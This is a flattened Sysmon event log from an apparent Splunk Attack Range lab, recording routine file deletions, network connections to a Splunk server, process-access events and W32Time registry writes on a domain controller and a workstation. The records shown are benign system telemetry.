23542300x80000000000000001048120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:55.605{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF394AAD20857323DF5F9F3D12153949,SHA256=856E5D1905E63CF154A1DF4CDE559AF6F632DB4F33ED44FD58BBF75C5D2746E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:55.290{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CC19D4BF6872ABB6CFEED31DF3F979B,SHA256=8811AA3DB72A43656B69D69271A662887F90FA16375745F3518510DAAB448729,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:56.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C97B947A34C0645E659EC461DE549A,SHA256=6E40CEFBC3FE03282AB8A607A5A3722B76B71A1099CB68FC74EE13FB340459F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.935{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.670{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F25C8604560C85EBDEA714EB1C930CD8,SHA256=2C29D20DA2F92BD351F1FFF092F2E44931722D5549757FEA983BDA3C0C82A922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC44A32093F66B59E695A0D40ECB022,SHA256=313DFB536E0980DCEFCAAFCEA9005A38F015280D4C0288192D6C81D3C7705AE3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:57.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8B1CA52C8D1E0F5083D2CB45BC39BBA,SHA256=1D0B8101FEFC252BF2418116D2BE269ED4736A3C752FE488F52E1FD6C1B550E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:57.585{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECFE6FB624C2ED6DE8BF4CFEF4E89F72,SHA256=064E7312CD08CFF1C7848F57EE44A51E27DECC2BB5DE17A3EC4C368563C6504F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:48.893{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-5553-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000807311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:58.617{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9EBF76CF594F915FDA549F232B1C5BE,SHA256=21A4055CDB48FC3F922444DEE9738BED7BED138DC9D6848B0A6D839567515918,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:50:50.465{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51006-false10.0.1.12-8089- 23542300x80000000000000001048128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:58.639{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E34044CBC883F2E12F1F354BE79DE0E7,SHA256=DFFE800953CF63002DC7D2C5162C22FDE9AC8F21334B6B7897F9739FE57DE822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:58.121{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf681cdf.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:49.712{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51005-false10.0.1.12-8000- 23542300x8000000000000000807313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:59.633{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A1FF0132671D1B13E375E8CA82667D2,SHA256=78A8C529F0FFEBDE78EFB3F39314FE0E16E137B72D000550BABBED17E7870C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:59.654{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC0BC4530CC3C3DEB33D4612493ECE66,SHA256=3BC33F85ABE8997559DBFE62A9E3EEFEDC502ACF24B61C102A0A646C90303C8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:57.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57246-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:00.664{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCD7BE00DD91337A8F634E5E24D14A1D,SHA256=255F3E7DE7B07486C88BC4EF79390926AB7E8806C1F97176F91A4923D6BCD1A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.654{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2439AED9AA01EB90EFE92467CC5C6E8,SHA256=1B73A68E2B71931E288D99F4525B79EEBEA29B29046F84D1BAC1D33B84056306,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001048136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001048135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001048134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001048133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6826b2.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.607{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=4EDC4025C912403937AF6029354FA73C,SHA256=46C67485491A2F668848C8ED3A4B31C4ACE26D2CE0DE9EE9E34B87B12528E733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.306{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=B0BABD45444F02C291E17FB7FD48A7A1,SHA256=B658EC900F8BC86A71BF2F61A540A626358B47CAC99CCA6BAC5BD90CBF1133B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:01.726{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B7B904E749142DCF03710CAD51C90B5,SHA256=6E2A7A5A39D95390068748CE0807195A931F9FBA6D4F3E591A9DB6FF938C1BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:01.672{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=350067C8B5197F7B4DB58C8F818E084B,SHA256=E2E0C6D43AA7497A5E802852308C8D083AE4EC51669871077AE4752CB0535F02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:01.637{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:02.675{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5CB8B74CA82537798B91AACEAA681AE,SHA256=DFCB33910ACBC32E2D63C575D1B6DF4EB74ACB775E3613BAC9D865E879D6C727,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:02.742{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EEFD4BA0F407E124DFADDCC7E11FBA7,SHA256=F046327D35DDAFDC44150AAA98877D172E4677E14D57AFF0C679A7297EB9A0C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:03.805{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E57F8CA295F4F44A651CAB3F77884C3C,SHA256=1C5BEAF87E932876E727F56A1D385DD8B5FB7727D57A09B945A0DF28A3669267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:03.696{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D27BC7FCAC362C14A4E3DFE7D3804718,SHA256=A28C7D99B71BC537E42E6A0ACEC8E783BF6CB322EF3481902C6168C2CB430902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:04.836{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC02AF25C7EE3E943E74E8AA3F1F702,SHA256=03B15068EF2DEB82C1A431975AA3FB5B2A5ACBC9F054DE17C2B34A820A02C842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:04.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BB634F21049BA86FB4C1F52C4AE8E86,SHA256=D02A1CA4B8258681FFC41D1F4F8E6C20CC770709A313E97883819024A970FC88,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000807328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000807327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f60f4e6) 13241300x8000000000000000807326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0x4855b5d5) 13241300x8000000000000000807325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f2-0xaa1a1dd5) 13241300x8000000000000000807324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x0bde85d5) 13241300x8000000000000000807323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000807322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f60f4e6) 13241300x8000000000000000807321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0x4855b5d5) 13241300x8000000000000000807320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f2-0xaa1a1dd5) 13241300x8000000000000000807319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x0bde85d5) 354300x8000000000000000807318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:03.218{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57247-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:04.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B745DA195616D4A8D272BC6AE9FF05CC,SHA256=53BF429ACE66C6D37B9C70DDEED133FD146E60675C9B1E0C42A37BFB431E4A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:04.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE0DA706F9E8F44D1A7B4C07DC48B571,SHA256=D24533168FD8B35725F36E5FC95CB334367A94C7C71A6F44821589A5D5018273,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:55.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51007-false10.0.1.12-8000- 23542300x8000000000000000807330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:05.836{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4337FB2156FE5AECA3D162D76C18F69,SHA256=E58BBAAA0D08877DA7B681A51990D1E820032E77D44675211FE5E26AA856870D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:05.726{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
